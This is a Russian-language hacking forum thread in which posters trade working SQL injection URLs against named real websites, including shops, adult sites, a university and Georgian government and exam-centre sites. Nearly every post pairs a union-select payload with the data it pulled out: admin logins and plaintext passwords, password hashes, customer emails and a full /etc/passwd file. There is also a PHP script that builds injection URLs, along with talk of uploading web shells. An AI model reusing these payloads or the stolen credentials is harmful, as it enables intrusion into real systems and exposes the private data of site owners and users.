SQL Инъекции

Сайт: www.haydamaky.com PR=4

Так и не смог найти таблицу в которой хрянится логин и пас к админке...

Вот таблицы

Админка

 

Code:

http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+order+by+107/*

я новичок, скажите пожалуйста, обязательно нужно просписывать все 107 полей в запросе?

 

http://www.devmaster.net/articles.php?catID=6+union+select+1,user()/*
version() - 5.0.45
database() - Dia_Kharrat_dm_main
user() - dia@localhost

result:
Reedbeta:fd50302fd2f3ef8f527465251903e4fa
Dia Kharrat:5a69a0668268a34d04333c77d2970949
Anubis:75352e3845c8c6a61e52893ce8b178b0
Baldurk:8d761c44f8e4daef212ab80bb8875a6c
Bladder:86c97024c1cb01ebdd09b4feeffdfa44

 

openit.com.ua

Кста, там чувак есть с античата - inlanger

пароль подходит тока на мыло

Database Version: 5.0.22-log
Database name: smat6_openit
User name: smat@localhost

Юзеры

Проверил robots.txt

блин, на бейсике...
пароль из мускуль: admin : admin_admin
кто найдет пасс к админке, стукните плз.. или пм

 

ДА, если что то надо достать. Руками собсно этого делать не обязательно, я например пользуюсь такой самопиской

Code:

<?php
for ($i=100; $i<108; $i++) {

echo "<a href='http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+union+select+";

   for ($j=1; $j<=$i; $j++) {
   echo $j;
   if ($j!=$i) echo ",";
   };
   
   echo "/*'>$i</a><br>";
}
?>

Установил границы и просматривай ответы. А вообще настолько тупых запросов я еще не видел. Ржите, господа:

Code:

SELECT * FROM EVENT LEFT JOIN REGION ON 
(E_USERREGION_ID=REGION_ID) LEFT JOIN KATEGORIE 
ON (E_USERKATEGORIE_ID=KATEGORIE_ID) LEFT JOIN 
BUNDESLAND ON 
(E_BUNDESLAND_ID=BUNDESLAND_ID) WHERE 
E_ID=99999999

107!!! полей выборки, из которых нужны макс 20, бедный сервак.

Ну и как результат

Code:

http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,user(),database(),37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,version(),user,password,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107+from+mysql.user/*

Даже не закрыт доступ к db mysql...

 

mmogame.ru

70к+ валидных мэйликов пользуйтесь =):

http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,LOAD_FILE(0x4579),5,6,7,email+from+mmo_users+limit+0,1000%20--%20&cat=1 Хэши паролей соленые((

http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,username,5,6,7,password+from+test_promoreklama.users+limit+0,1000%20--%20&cat=1 От базы проморекламы, хэши не соленые, на счету модера 130к+ деревянных, но у него пасс сцуко не шифруется - поэтому скул в паблик, кто откроет может поделится)...

4sexshop.ru

Упал только что, а так вот хэш пароля админа

http://www.4sexshop.ru/shop/goods/%20188999+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,concat(0x3c2f7469746c653e3c68313e,%20%20pass,0x3c2f68313e),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+user.htm

Админка: admin : ok (нубярко=)

В админке можете поискать своего озабоченного друга, все данные о клиентах там есть вплоть до прописки

 

Это не странные хеши) это MD5(Unix) вроде)

вот и сами хэши

[email protected] : $1$LenAr$0GbWVUnw3liEE4HT4Gskm0
[email protected] : $1$LenAr$vpSwW7oIhLIYn6n5eLL2W.
[email protected] : $1$LenAr$QGD8EMTZSpBkR72abB8Ak.

 

Paraavis.com - PR 4

5 версия, смотрим таблы..

увидев phpbb я сразу кинулся заливать шелл... но тут неудача.... аватарка не загружается и востановления бд не рабоатет......
planer;patagonia

дальше.. я увидел таблы с IPB но сам форум так и не нашел...

пасс и соль поидее....

какието юзеры..

еще юзеры..


Newprint.ru

нелюблю я мелких...... но приходится)

вот нужная там табла.. и колонка к ней...

админка

 

www.scrapbookingmemories.com.au


user(): [email protected]
version(): 4.1.20
database(): showcase_sbm

file_priv = Y но права поставлены так что не читаются файлы пользователей
/etc/passwd читается, если верить /etc/redhat-release то система Red Hat Enterprise Linux ES release 4 (Nahant Update 5)

http://www.scrapbookingmemories.com.au/scraproom/index.php?content=album&user=24377777777777+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,username,password,email),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/users/**/limit/**/2,1/*&coll=1003

count from users = 2874
пароли в чистом виде

доп. инфо:

/home/scrap/public_html/scraproom/global_includes/select.php

Code:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
phpmyadmin:x:500:500::/home/phpmyadmin:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

 

Сервер там Microsoft-IIS/6.0 стоит.
Лови админку:

http://www.newprint.ru/_admin/

Только чот она грузится долго( У меня такое чувство, то они специально "зашифровались" :-D ... По моему еще какой-то файлик идет после /_admin/ ... .
Но путь админки - 100%

 

http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,mail,3,4+from+us/*&sale=3&order=

Мылы покупателей кому нада... Пассы манагеров нашел, админов нет( Потому что саму админку найти не могу... файлприв вроде нету(

 

Для тех у кого уже руки трясутся =)

http://putana.nu
http://putana.nu/list.php?link=-30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
Login: rdvi02
Pass: 247580

http://sexrobot.ru
http://sexrobot.ru/list.php?link=711+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://pentboy.ru
http://pentboy.ru/list.php?link=34637+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://robosex.ru
http://robosex.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://magdalina.ru
http://magdalina.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://dosugspb.ru
http://dosugspb.ru/list.php?link=37849+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://sexmodeli.org
http://sexmodeli.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://sexmodeli.net
http://sexmodeli.net/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://sexmodeli.ru
http://sexmodeli.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://intimuslugi.org
http://intimuslugi.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://intimuslugi.net
http://intimuslugi.net/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://magdalina.org
http://magdalina.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://intimdosug.org
http://intimdosug.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://mskputana.ru
http://mskputana.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://spbputana.ru
http://spbputana.ru/list.php?link=37849+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://dosugmsk.ru
http://dosugmsk.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

 

админка
http://www.remeco.ru/login.php
но не работает


все таблицы
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,table_name,3,4+from+information_schema.tables/**/limit/**/16,99999/*&sale=3&order=


манагеры
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0x3a,name,login,pwd,mail),3,4+from+manager/*&sale=3&order=


пользователи из user1
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0x3a,id,name,mail,inn,passwd,score,status),3,4+from+user1/*&sale=3&order=

 

WarLib.ru - PR 5

PicHost.ru

5 ветка..

юзеры.. но с выводом туповато.. (

 

expert.com.ua (193.178.145.3)

Яндекс тИЦ 1200

Path: /var/www/expert/expert.com.ua/index.php

Database Version: 4.1.22-log
Database name: expert
User name: u_expert@localhost

Привилегии файл запрещены (

 

ItLab.unn.ru - PR 5
Нижегородский государственный университет им.Н.И.Лобачевского.
ЛАБОРАТОРИЯ ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ .
Факультет вычислительной математики и кибернетики.

5 ветка и таблы..

админка

юзеры из другой базы..

другие юзеры..


Software.unn.ac.ru

software.unn.ac.ru/manager/

также сдесь: Unn.ru - PR 6

при регистрации можно залить шелл... токо исполнение не полное.. можно чтот придумать..

 

www.effective.net.ua

Яндекс тИЦ - 30

version() = 4.0.27-log
database() = effectiv_effe
user() = effectiv_effe@localhost

http://m2.com.ua

3 ветка

http://www.kiis.com.ua

version() = 5.0.37-log
user() = [email protected]
database() = kiis

 

Teatrdoc.ru - PR 5
Театр.DOC

Novochgrad.ru - PR 3
Новочеркасск. Администрация Города.

 

www.naec.ge
Examination Center provides Georgian

http://www.naec.ge/more.php?t=links.php&f=20&su=semassessmentland&rig_no=1&id=-86'+union+select+1,2,3,4,5,6,7,8,concat(username,char(58),passwd),10,11+from+user+limit+0,1/*&lang=eng
xarebava:naecge

Login: xarebava
Pass: naecge

 

http://www.mes.gov.ge/
Ministry of education and science of Georgia

http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&search_day=-14'+union+select+1,2,3,id,user,pass,7+from+gov_password/*
http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&search_day=-14'+union+select+1,2,3,concat(table_name,char(58),column_name,char(58),table_schema),5,6,7+from+information_schema.columns/*

Login:mesarion
Pass: yvancha